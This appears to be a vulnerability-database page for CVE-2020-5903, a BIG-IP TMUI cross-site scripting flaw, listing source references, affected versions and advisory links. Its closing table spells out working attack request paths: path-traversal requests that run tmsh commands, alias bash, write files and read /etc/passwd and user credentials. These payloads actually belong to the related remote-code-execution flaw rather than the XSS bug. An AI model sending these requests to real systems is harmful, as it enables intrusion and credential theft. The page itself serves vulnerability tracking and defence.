| Title | Published | Views | Family |
|---|---|---|---|
| The vulnerabilities of BIG-IP’s access control and remote authentication mechanisms (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) are related to the lack of protective measures for the website structure. This allows attackers to carry out cross-site scripting attacks. | 6 Sep 2021 00:00 | – | bdu_fstec |
| CVE-2020-5903 | 3 Jul 2020 17:08 | – | circl |
| F5 BIG-IP Cross-Site Scripting Vulnerability (CNVD-2020-61639) | 2 Jul 2020 00:00 | – | cnvd |
| CVE-2020-5903 | 1 Jul 2020 14:42 | – | cvelist |
| EUVD-2020-27057 | 7 Oct 2025 00:30 | – | euvd |
| Exploit for Cross-site Scripting in F5 Big-Ip_Access_Policy_Manager | 25 Aug 2020 02:07 | – | githubexploit |
| K43638305: BIG-IP TMUI XSS vulnerability CVE-2020-5903 | 21 Feb 2023 18:53 | – | f5 |
| F5 Networks BIG-IP : BIG-IP TMUI XSS vulnerability (K43638305) | 1 Jul 2020 00:00 | – | nessus |
| CVE-2020-5903 | 1 Jul 2020 15:15 | – | nvd |
| CVE-2020-5903 | 1 Jul 2020 15:15 | – | osv |

```json
[
  {
    "product": "BIG-IP",
    "vendor": "n/a",
    "versions": [
      {
        "status": "affected",
        "version": "15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1"
      }
    ]
  }
]
```

| Source | Link |
|---|---|
| kb | www.kb.cert.org/vuls/id/290915 |
| support | www.support.f5.com/csp/article/K43638305 |
| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list | Remote code execution via tmshCmd.jsp by deleting a cli alias | |
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash | Remote code execution via tmshCmd.jsp by creating a cli alias with bash command | |
| fileName | query param | tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id | Write arbitrary content to a file via fileSave.jsp | |
| content | query param | tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id | Write arbitrary content to a file via fileSave.jsp | |
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/WWWWW | List command output including a temporary file via tmshCmd.jsp | |
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user | Read user authentication information via tmshCmd.jsp | |
| fileName | query param | tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd | Read sensitive system file via fileRead.jsp | |
| directoryPath | query param | tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ | List directory contents via directoryList.jsp | |